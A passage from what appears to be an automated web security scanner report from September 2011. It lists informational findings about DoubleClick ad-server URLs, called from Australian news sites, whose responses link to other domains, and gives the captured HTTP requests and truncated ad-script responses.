<noscript><a target="_blank" href="http://ad.yieldmanager.com/clk?3,eAGljFFvgjAUhf8Qoe3aMlizhwtFwmZJUBiRt1qrNVNZUgzx329Tsj-w83DPd-.JPYQKu9eYxFYnhj8bkmhB6BNjDONozwMshKCE8phGPI6CTrcS3nYfRZ2e1gWDuzJ9e3.Q71QAm3lrAWrIM0.TfL6sF4bM-E-TxwJ--u8qAQ4PSuoeVrJM5wBA5kzJklXFyi27mledGlWzOKkM86qozsvGsL7Zfaqud0q2dDP9fb4GgRvHrxeE9DW82MmHN-2GITTDGY3OTtaPaHv1x4v1Hn0D6R5cvA==,http://ad.au.doubleclick.net/6k%3Bh%3Dv8/3b7b/f/142/%2a/q%3B232275021%3B13-0%3B0%3B56154821%3B3454-728/90%3B40944383/40962170/1%3B%3B%7Esscs%3D%3fhttp%3a%2f%2fwww.rsvp.com.au/foyer/index5.jsp%3Fs_cid%3Ddr%3Abt%3AYahoo%3Ahelping"><img src="http://s0.2mdn.net/2227036/rsvp_feb11_728x90.gif" width="728" height="90" border="0" alt="Advertisement" galleryimg="no"></a>
...[SNIP]...

14.7. http://ad.au.doubleclick.net/adj/ndm.news/news/breakingnews previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.au.doubleclick.net
Path:	/adj/ndm.news/news/breakingnews

Issue detail

The page was loaded from a URL containing a query string:

http://ad.au.doubleclick.net/adj/ndm.news/news/breakingnews;sec1=news;sec2=breakingnews;tile=5;pos=1;pagetype=index;viewno=1;sz=300x100;u=pos=1,pagetype=index,zone=news.breakingnews;kw=australia,latest,world,today,international,breaking,news;ord=22027575?

The response contains the following link to another domain:

http://sops.news.com.au/images/filler/truelocal/Brand_300x100.gif

Request

GET /adj/ndm.news/news/breakingnews;sec1=news;sec2=breakingnews;tile=5;pos=1;pagetype=index;viewno=1;sz=300x100;u=pos=1,pagetype=index,zone=news.breakingnews;kw=australia,latest,world,today,international,breaking,news;ord=22027575? HTTP/1.1
Host: ad.au.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.news.com.au/breaking-news?useAbsoluteURL=true
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 567
Date: Wed, 07 Sep 2011 14:18:28 GMT

document.write('<a target="_blank" href="http://ad.au.doubleclick.net/6k;h=v8/3b7b/0/0/%2a/b;217650671;0-0;0;24452137;3823-300/100;37424892/37442769/1;u=pos=1,pagetype=index,zone=news.breakingnews;~ok
...[SNIP]...
;pos=1;pagetype=index;viewno=1;sz=300x100;u=pos=1,pagetype=index,zone=news.breakingnews;kw=australia,latest,world,today,international,breaking,news;~aopt=2/1/90/2;~sscs=%3fhttp://www.truelocal.com.au"><img src="http://sops.news.com.au/images/filler/truelocal/Brand_300x100.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

14.8. http://ad.au.doubleclick.net/adj/ndm.news/news/breakingnews previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.au.doubleclick.net
Path:	/adj/ndm.news/news/breakingnews

Issue detail

The page was loaded from a URL containing a query string:

http://ad.au.doubleclick.net/adj/ndm.news/news/breakingnews;sec1=news;sec2=breakingnews;tile=6;pos=2;pagetype=index;viewno=1;sz=300x100;u=pos=2,pagetype=index,zone=news.breakingnews;kw=australia,latest,world,today,international,breaking,news;ord=22027575?

The response contains the following link to another domain:

http://sops.news.com.au/adkit/img/1x1.gif

Request

GET /adj/ndm.news/news/breakingnews;sec1=news;sec2=breakingnews;tile=6;pos=2;pagetype=index;viewno=1;sz=300x100;u=pos=2,pagetype=index,zone=news.breakingnews;kw=australia,latest,world,today,international,breaking,news;ord=22027575? HTTP/1.1
Host: ad.au.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.news.com.au/breaking-news?useAbsoluteURL=true
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 526
Date: Wed, 07 Sep 2011 14:18:31 GMT

document.write('<a target="_blank" href="http://ad.au.doubleclick.net/6k;h=v8/3b7b/0/0/%2a/l;228139257;0-0;0;24452137;3823-300/100;38067738/38085495/1;u=pos=2,pagetype=index,zone=news.breakingnews;~ok
...[SNIP]...
eakingnews;tile=6;pos=2;pagetype=index;viewno=1;sz=300x100;u=pos=2,pagetype=index,zone=news.breakingnews;kw=australia,latest,world,today,international,breaking,news;~aopt=2/1/90/2;~sscs=%3fhttp://www"><img src="http://sops.news.com.au/adkit/img/1x1.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

14.9. http://ad.au.doubleclick.net/adj/ndm.news/news/weather previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.au.doubleclick.net
Path:	/adj/ndm.news/news/weather

Issue detail

The page was loaded from a URL containing a query string:

http://ad.au.doubleclick.net/adj/ndm.news/news/weather;sec1=news;sec2=weather;tile=5;pos=1;viewno=1;sz=300x100;u=pos=1,zone=news.weather;ord=55968566?

The response contains the following link to another domain:

http://sops.news.com.au/images/filler/truelocal/Brand_300x100.gif

Request

GET /adj/ndm.news/news/weather;sec1=news;sec2=weather;tile=5;pos=1;viewno=1;sz=300x100;u=pos=1,zone=news.weather;ord=55968566? HTTP/1.1
Host: ad.au.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://weather.news.com.au/wa/perth/perth
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 447
Date: Wed, 07 Sep 2011 14:14:42 GMT

document.write('<a target="_blank" href="http://ad.au.doubleclick.net/6k;h=v8/3b7b/0/0/%2a/m;217650671;0-0;0;24749205;3823-300/100;37424892/37442769/1;u=pos=1,zone=news.weather;~okv=;sec1=news;sec2=weather;tile=5;pos=1;viewno=1;sz=300x100;u=pos=1,zone=news.weather;~aopt=2/1/90/2;~sscs=%3fhttp://www.truelocal.com.au"><img src="http://sops.news.com.au/images/filler/truelocal/Brand_300x100.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

14.10. http://ad.au.doubleclick.net/adj/ndm.news/news/weather previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.au.doubleclick.net
Path:	/adj/ndm.news/news/weather

Issue detail

The page was loaded from a URL containing a query string:

http://ad.au.doubleclick.net/adj/ndm.news/news/weather;sec1=news;sec2=weather;tile=2;pos=1;viewno=1;sz=650x40;u=pos=1,zone=news.weather;ord=55968566?

The response contains the following link to another domain:

http://sops.news.com.au/adkit/img/1x1.gif

Request

GET /adj/ndm.news/news/weather;sec1=news;sec2=weather;tile=2;pos=1;viewno=1;sz=650x40;u=pos=1,zone=news.weather;ord=55968566? HTTP/1.1
Host: ad.au.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://weather.news.com.au/wa/perth/perth
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 405
Date: Wed, 07 Sep 2011 14:14:32 GMT

document.write('<a target="_blank" href="http://ad.au.doubleclick.net/6k;h=v8/3b7b/0/0/%2a/x;228139349;0-0;0;24749205;27008-650/40;38067778/38085535/1;u=pos=1,zone=news.weather;~okv=;sec1=news;sec2=weather;tile=2;pos=1;viewno=1;sz=650x40;u=pos=1,zone=news.weather;~aopt=2/1/90/2;~sscs=%3fhttp://www"><img src="http://sops.news.com.au/adkit/img/1x1.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

14.11. http://ad.au.doubleclick.net/adj/ndm.ntn/news/home previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.au.doubleclick.net
Path:	/adj/ndm.ntn/news/home

Issue detail

The page was loaded from a URL containing a query string:

http://ad.au.doubleclick.net/adj/ndm.ntn/news/home;sec1=news;sec2=home;tile=4;pos=2;pagetype=homepage;viewno=1;sz=300x100;u=pos=2,pagetype=homepage,zone=news.home;kw=darwin,northern,territory,australia,breaking,latest,headlines,newspapers,online,news,limited;ord=22310882?

The response contains the following link to another domain:

http://sops.news.com.au/images/filler/truelocal/Brand_300x100.gif

Request

GET /adj/ndm.ntn/news/home;sec1=news;sec2=home;tile=4;pos=2;pagetype=homepage;viewno=1;sz=300x100;u=pos=2,pagetype=homepage,zone=news.home;kw=darwin,northern,territory,australia,breaking,latest,headlines,newspapers,online,news,limited;ord=22310882? HTTP/1.1
Host: ad.au.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.ntnews.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 586
Date: Wed, 07 Sep 2011 14:15:06 GMT

document.write('<a target="_top" href="http://ad.au.doubleclick.net/6k;h=v8/3b7b/0/0/%2a/f;217650671;0-0;0;24492038;3823-300/100;37424892/37442769/1;u=pos=2,pagetype=homepage,zone=news.home;~okv=;sec1
...[SNIP]...
sz=300x100;u=pos=2,pagetype=homepage,zone=news.home;kw=darwin,northern,territory,australia,breaking,latest,headlines,newspapers,online,news,limited;~aopt=2/1/90/2;~sscs=%3fhttp://www.truelocal.com.au"><img src="http://sops.news.com.au/images/filler/truelocal/Brand_300x100.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

14.12. http://ad.au.doubleclick.net/adj/ndm.ntn/news/home previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.au.doubleclick.net
Path:	/adj/ndm.ntn/news/home

Issue detail

The page was loaded from a URL containing a query string:

http://ad.au.doubleclick.net/adj/ndm.ntn/news/home;sec1=news;sec2=home;tile=3;pos=1;pagetype=homepage;viewno=1;sz=300x100;u=pos=1,pagetype=homepage,zone=news.home;kw=darwin,northern,territory,australia,breaking,latest,headlines,newspapers,online,news,limited;ord=22310882?

The response contains the following link to another domain:

http://sops.news.com.au/adkit/img/1x1.gif

Request

GET /adj/ndm.ntn/news/home;sec1=news;sec2=home;tile=3;pos=1;pagetype=homepage;viewno=1;sz=300x100;u=pos=1,pagetype=homepage,zone=news.home;kw=darwin,northern,territory,australia,breaking,latest,headlines,newspapers,online,news,limited;ord=22310882? HTTP/1.1
Host: ad.au.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.ntnews.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 545
Date: Wed, 07 Sep 2011 14:15:03 GMT

document.write('<a target="_top" href="http://ad.au.doubleclick.net/6k;h=v8/3b7b/0/0/%2a/p;228139257;0-0;0;24492038;3823-300/100;38067738/38085495/1;u=pos=1,pagetype=homepage,zone=news.home;~okv=;sec1
...[SNIP]...
omepage;viewno=1;sz=300x100;u=pos=1,pagetype=homepage,zone=news.home;kw=darwin,northern,territory,australia,breaking,latest,headlines,newspapers,online,news,limited;~aopt=2/1/90/2;~sscs=%3fhttp://www"><img src="http://sops.news.com.au/adkit/img/1x1.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

14.13. http://ad.au.doubleclick.net/adj/ndm.ntn/news/local previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.au.doubleclick.net
Path:	/adj/ndm.ntn/news/local

Issue detail

The page was loaded from a URL containing a query string:

http://ad.au.doubleclick.net/adj/ndm.ntn/news/local;sec1=news;sec2=local;tile=4;pos=2;pagetype=story;viewno=2;sz=300x100;u=pos=2,pagetype=story,zone=news.local;kw=darwin,northern,territory,australia,breaking,latest,headlines,newspapers,online,news,limited;ord=16264736?

The response contains the following link to another domain:

http://sops.news.com.au/images/filler/truelocal/Brand_300x100.gif

Request

GET /adj/ndm.ntn/news/local;sec1=news;sec2=local;tile=4;pos=2;pagetype=story;viewno=2;sz=300x100;u=pos=2,pagetype=story,zone=news.local;kw=darwin,northern,territory,australia,breaking,latest,headlines,newspapers,online,news,limited;ord=16264736? HTTP/1.1
Host: ad.au.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.ntnews.com.au/article/2011/09/07/258681_ntnews.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 580
Date: Wed, 07 Sep 2011 14:17:37 GMT

document.write('<a target="_top" href="http://ad.au.doubleclick.net/6k;h=v8/3b7b/0/0/%2a/v;217650671;0-0;0;40546503;3823-300/100;37424892/37442769/1;u=pos=2,pagetype=story,zone=news.local;~okv=;sec1=n
...[SNIP]...
2;sz=300x100;u=pos=2,pagetype=story,zone=news.local;kw=darwin,northern,territory,australia,breaking,latest,headlines,newspapers,online,news,limited;~aopt=2/1/90/2;~sscs=%3fhttp://www.truelocal.com.au"><img src="http://sops.news.com.au/images/filler/truelocal/Brand_300x100.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

14.14. http://ad.au.doubleclick.net/adj/ndm.ntn/news/local previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.au.doubleclick.net
Path:	/adj/ndm.ntn/news/local

Issue detail

The page was loaded from a URL containing a query string:

http://ad.au.doubleclick.net/adj/ndm.ntn/news/local;sec1=news;sec2=local;tile=3;pos=1;pagetype=story;viewno=2;sz=300x100;u=pos=1,pagetype=story,zone=news.local;kw=darwin,northern,territory,australia,breaking,latest,headlines,newspapers,online,news,limited;ord=16264736?

The response contains the following link to another domain:

http://sops.news.com.au/adkit/img/1x1.gif

Request

GET /adj/ndm.ntn/news/local;sec1=news;sec2=local;tile=3;pos=1;pagetype=story;viewno=2;sz=300x100;u=pos=1,pagetype=story,zone=news.local;kw=darwin,northern,territory,australia,breaking,latest,headlines,newspapers,online,news,limited;ord=16264736? HTTP/1.1
Host: ad.au.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.ntnews.com.au/article/2011/09/07/258681_ntnews.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 539
Date: Wed, 07 Sep 2011 14:17:32 GMT

document.write('<a target="_top" href="http://ad.au.doubleclick.net/6k;h=v8/3b7b/0/0/%2a/f;228139257;0-0;0;40546503;3823-300/100;38067738/38085495/1;u=pos=1,pagetype=story,zone=news.local;~okv=;sec1=n
...[SNIP]...
ype=story;viewno=2;sz=300x100;u=pos=1,pagetype=story,zone=news.local;kw=darwin,northern,territory,australia,breaking,latest,headlines,newspapers,online,news,limited;~aopt=2/1/90/2;~sscs=%3fhttp://www"><img src="http://sops.news.com.au/adkit/img/1x1.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

14.15. http://ad.au.doubleclick.net/adj/ndm.tmrc/news/home previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.au.doubleclick.net
Path:	/adj/ndm.tmrc/news/home

Issue detail

The page was loaded from a URL containing a query string:

http://ad.au.doubleclick.net/adj/ndm.tmrc/news/home;sec1=news;sec2=home;tile=4;pos=1;viewno=1;tn=3;to=v;szs=1x1,1x1,1x1;u=pos=1,zone=news.home;kw=the,mercury,breaking,latest,headlines,media,local,international,worldwide,daily,weekly,australia,classifieds,employment,cars,property,real,estate,business,investment,sports,technology,i,t,entertainment,finance,weather,community,interactive,limited,news,corporation;ord=14495795?

The response contains the following links to other domains:

http://s0.2mdn.net/viewad/817-grey.gif
http://sops.news.com.au/adkit/img/1x1.gif

Request

GET /adj/ndm.tmrc/news/home;sec1=news;sec2=home;tile=4;pos=1;viewno=1;tn=3;to=v;szs=1x1,1x1,1x1;u=pos=1,zone=news.home;kw=the,mercury,breaking,latest,headlines,media,local,international,worldwide,daily,weekly,australia,classifieds,employment,cars,property,real,estate,business,investment,sports,technology,i,t,entertainment,finance,weather,community,interactive,limited,news,corporation;ord=14495795? HTTP/1.1
Host: ad.au.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.themercury.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 3110
Date: Wed, 07 Sep 2011 14:15:31 GMT

document.write('<table border=0 cellpadding=0 cellspacing=0><tr><td align=center valign=top><a target="_top" href="http://ad.au.doubleclick.net/6k;h=v8/3b7b/0/0/%2a/x;228138576;0-0;0;24498589;31-1/1;3
...[SNIP]...
ssifieds,employment,cars,property,real,estate,business,investment,sports,technology,i,t,entertainment,finance,weather,community,interactive,limited,news,corporation;~aopt=2/1/90/2;~sscs=%3fhttp://www"><img src="http://sops.news.com.au/adkit/img/1x1.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...
tralia,classifieds,employment,cars,property,real,estate,business,investment,sports,technology,i,t,entertainment,finance,weather,community,interactive,limited,news,corporation;~aopt=2/1/90/2;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

14.16. http://ad.au.doubleclick.net/adj/ndm.tmrc/news/local previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.au.doubleclick.net
Path:	/adj/ndm.tmrc/news/local

Issue detail

The page was loaded from a URL containing a query string:

http://ad.au.doubleclick.net/adj/ndm.tmrc/news/local;sec1=news;sec2=local;tile=4;pos=1;viewno=2;tn=3;to=v;szs=1x1,1x1,1x1;u=pos=1,zone=news.local;kw=breaking,latest,headlines,media,local,international,worldwide,weekly,australia,newspapers,online,mastheads,australian,daily,telegraph,courier,mail,herald,sun,mercury,the,advertiser,sunday,times,classifieds,employment,cars,property,real,estate,business,investment,sports,technology,i,t,entertainment,finance,weather,community,interactive,limited;ord=57431766?

The response contains the following links to other domains:

http://s0.2mdn.net/viewad/817-grey.gif
http://sops.news.com.au/adkit/img/1x1.gif

Request

GET /adj/ndm.tmrc/news/local;sec1=news;sec2=local;tile=4;pos=1;viewno=2;tn=3;to=v;szs=1x1,1x1,1x1;u=pos=1,zone=news.local;kw=breaking,latest,headlines,media,local,international,worldwide,weekly,australia,newspapers,online,mastheads,australian,daily,telegraph,courier,mail,herald,sun,mercury,the,advertiser,sunday,times,classifieds,employment,cars,property,real,estate,business,investment,sports,technology,i,t,entertainment,finance,weather,community,interactive,limited;ord=57431766? HTTP/1.1
Host: ad.au.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.themercury.com.au/article/2011/09/07/259671_tasmania-news.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 3482
Date: Wed, 07 Sep 2011 14:18:06 GMT

document.write('<table border=0 cellpadding=0 cellspacing=0><tr><td align=center valign=top>\n\n<p><strong><a href=\"http://ad.au.d
...[SNIP]...
,sunday,times,classifieds,employment,cars,property,real,estate,business,investment,sports,technology,i,t,entertainment,finance,weather,community,interactive,limited;~aopt=2/1/90/2;~sscs=%3fhttp://www"><img src="http://sops.news.com.au/adkit/img/1x1.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...
advertiser,sunday,times,classifieds,employment,cars,property,real,estate,business,investment,sports,technology,i,t,entertainment,finance,weather,community,interactive,limited;~aopt=2/1/90/2;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

14.17. http://ad.au.doubleclick.net/adj/ndm.tst/business/businessold/news previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.au.doubleclick.net
Path:	/adj/ndm.tst/business/businessold/news

Issue detail

The page was loaded from a URL containing a query string:

http://ad.au.doubleclick.net/adj/ndm.tst/business/businessold/news;sec1=business;sec2=businessold;sec3=news;tile=3;pos=1;pagetype=story;viewno=3;sz=300x100;u=pos=1,pagetype=story,zone=business.businessold.news;kw=burrup,fertilisers,mrs,writ,radhika,oswal,allegation,anz,bank;ord=81054039?

The response contains the following link to another domain:

http://sops.news.com.au/images/filler/truelocal/Brand_300x100.gif

Request

GET /adj/ndm.tst/business/businessold/news;sec1=business;sec2=businessold;sec3=news;tile=3;pos=1;pagetype=story;viewno=3;sz=300x100;u=pos=1,pagetype=story,zone=business.businessold.news;kw=burrup,fertilisers,mrs,writ,radhika,oswal,allegation,anz,bank;ord=81054039? HTTP/1.1
Host: ad.au.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/business/business-old/fraud-blackmail-in-latest-oswal-claims/story-e6frg2qu-1226131700884
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 599
Date: Wed, 07 Sep 2011 14:19:17 GMT

document.write('<a target="_top" href="http://ad.au.doubleclick.net/6k;h=v8/3b7b/0/0/%2a/i;217650671;0-0;0;64857077;3823-300/100;37424892/37442769/1;u=pos=1,pagetype=story,zone=business.businessold.ne
...[SNIP]...
pe=story;viewno=3;sz=300x100;u=pos=1,pagetype=story,zone=business.businessold.news;kw=burrup,fertilisers,mrs,writ,radhika,oswal,allegation,anz,bank;~aopt=2/1/90/2;~sscs=%3fhttp://www.truelocal.com.au"><img src="http://sops.news.com.au/images/filler/truelocal/Brand_300x100.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

14.18. http://ad.doubleclick.net/adi/N3753.158901.DATAXU/B5319162.2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3753.158901.DATAXU/B5319162.2

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N3753.158901.DATAXU/B5319162.2;sz=300x250;pc=[TPAS_ID];ord=1315404893?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/2549284/K1006_IS_MY11_LDA_PhotoGallery_300x250.jpg

Request

GET /adi/N3753.158901.DATAXU/B5319162.2;sz=300x250;pc=[TPAS_ID];ord=1315404893? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?CY80ANBtDAAFUIkAAAAAABvfIgAAAAAAAgAIAAIAAAAAAP8AAAAECv9yGAAAAAAA9awPAAAAAABnti0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAqvHSTWKQ8j9xPQrXo3DzP6HTBjptoARAmpmZmZmZBUCh0wY6baAEQJqZmZmZmQVAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABP8pWz3WCwCky7VqPoER8p2P8LgmYiHMJbwA-5AAAAAA==,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F7856%2F12590%2F22893-15.html%3Fcb%3D0.33166992268525064,Z%3D300x250%26_salt%3D1434180912%26anmember%3D514%26anprice%3D%26keyword%3Dsmh%2Fnews_other%26r%3D0%26rf%3Dhttp%253A%2F%2Fnews.smh.com.au%2Fbreaking-news-national%2Fwa-labor-launches-another-bushfire-probe-20110907-1jx2h.html%26s%3D814544,c151e658-d95b-11e0-9465-78e7d15f7c8c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 486
Date: Wed, 07 Sep 2011 14:14:54 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b7b/0/0/%2a/h;238973829;0-0;0;61502802;4307-300/250;43429623/43447410/1;;~okv=;pc=[TPAS_ID];;~sscs=%3fhttp://www.YourLexusDealer.com/"><img src="http://s0.2mdn.net/viewad/2549284/K1006_IS_MY11_LDA_PhotoGallery_300x250.jpg" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

14.19. http://ad.doubleclick.net/adi/N3753.158901.DATAXU/B5319162.9 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3753.158901.DATAXU/B5319162.9

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N3753.158901.DATAXU/B5319162.9;sz=728x90;pc=[TPAS_ID];ord=1315404937?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/2549284/K1006_IS_MY11_LDA_PhotoGallery_728x90.jpg

Request

GET /adi/N3753.158901.DATAXU/B5319162.9;sz=728x90;pc=[TPAS_ID];ord=1315404937? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?CY80ANBtDAANUIkAAAAAABvfIgAAAAAAAgAMAAYAAAAAAP8AAAAECv9yGAAAAAAA9awPAAAAAABnti0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAqvHSTWKQ8j9xPQrXo3DzP6HTBjptoARAmpmZmZmZBUCh0wY6baAEQJqZmZmZmQVAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADzNqRCGGwCsjwNm9MzGLoTGhnE67ePXdq7xGqAAAAAA==,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F7856%2F12590%2F22893-2.html%3Fcb%3D0.8213596055284142,Z%3D728x90%26_salt%3D1895836571%26anmember%3D514%26anprice%3D%26keyword%3Dsmh%2Fnews_other%26r%3D0%26s%3D814544,db61e354-d95b-11e0-85c9-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 484
Date: Wed, 07 Sep 2011 14:15:37 GMT

